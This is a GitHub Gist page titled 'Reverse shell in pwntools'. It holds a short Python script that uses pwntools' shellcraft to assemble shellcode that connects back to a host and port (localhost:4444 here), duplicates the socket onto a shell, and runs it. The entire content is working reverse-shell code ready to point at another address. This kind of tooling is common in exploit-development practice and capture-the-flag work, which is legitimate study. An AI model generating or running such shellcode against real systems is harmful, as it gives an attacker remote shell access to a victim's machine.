Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings
Last active March 30, 2019 12:58
Show Gist options
  • Save FrankSpierings/50bb614fab5696b633e626658ad4762b to your computer and use it in GitHub Desktop.
Save FrankSpierings/50bb614fab5696b633e626658ad4762b to your computer and use it in GitHub Desktop.
Reverse shell in pwntools
from pwn import *
# context(arch='x86_64')
context(arch='i386')
host = 'localhost'
port = 4444
if context.arch == 'i386':
sock = 'edx'
elif context.arch == 'amd64':
sock = 'rbp'
else:
raise NotImplementedError('Program the correct register for sock.')
shellcode = pwnlib.shellcraft.connect(host,port)
shellcode += pwnlib.shellcraft.dupsh(sock)
log.info('Shellcode: \n{0}'.format(shellcode))
log.info('Length shellcode: {0} = 0x{0:x}'.format(len(asm(shellcode))))
p = run_assembly(shellcode)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment